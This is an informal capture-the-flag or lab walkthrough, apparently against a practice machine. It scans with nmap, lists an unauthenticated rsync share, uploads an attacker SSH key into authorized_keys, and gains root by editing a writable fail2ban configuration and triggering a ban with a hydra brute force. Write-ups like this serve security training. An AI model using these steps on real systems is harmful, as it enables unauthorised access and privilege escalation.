First we start with an nmap scan

nmap -sC -sV -T4 -oN nmap.txt <IP>

# Nmap 7.93 scan initiated Mon Dec 26 05:39:57 2022 as: nmap -sC -sV -T4 -oN quickmap.txt -Pn 192.168.108.126
Nmap scan report for 192.168.108.126
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74ba2023899262029fe73d3b83d4d96c (RSA)
|   256 548f79555ab03a695ad5723964fd074e (ECDSA)
|_  256 7f5d102762ba75e9bcc84fe27287d4e2 (ED25519)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 26 05:40:15 2022 -- 1 IP address (1 host up) scanned in 18.24 seconds

Nice got 2 ports ssh and rsync. Enumerating port 873 rsync service. using nmap script

nmap -sV --script "rsync-list-modules" -p 873 <IP>

got the share name check what is listed in the share without auth.

rsync -av --list-only rsync://<IP>/sharename

Tried to upload a file in the share and check.

touch shell
rysnc shell <IP>::share
rysnc -av --list-only rsync://<IP>/share

worked. Attcking through ssh key, created an authorised key file in .ssh dir.

put my attacker id_rsa.pub key in the authorized_key file.

Uploaded the auth_key into the share and list to confirm if it is there

rsync -r ./.ssh/ <IP>::share/.ssh

Now ssh into the box

Boom I’m in… i place it under my genjitsu 😂. proceed to escalate privs. By typing cmd id, the user fox is in a fail2ban group, so i check online for escalting privs with it. first i check the fail2ban.conf

The path above is writeable, so i edited it

checking the fail2ba.conf file, the ban time is 1min, attempt before ban is 2

now tried triggering it by bruteforcing ssh with hydra on it 🤠…

Boom I got banned, let’s check the result of the ban action.

Boom!!! I got root 😎😎.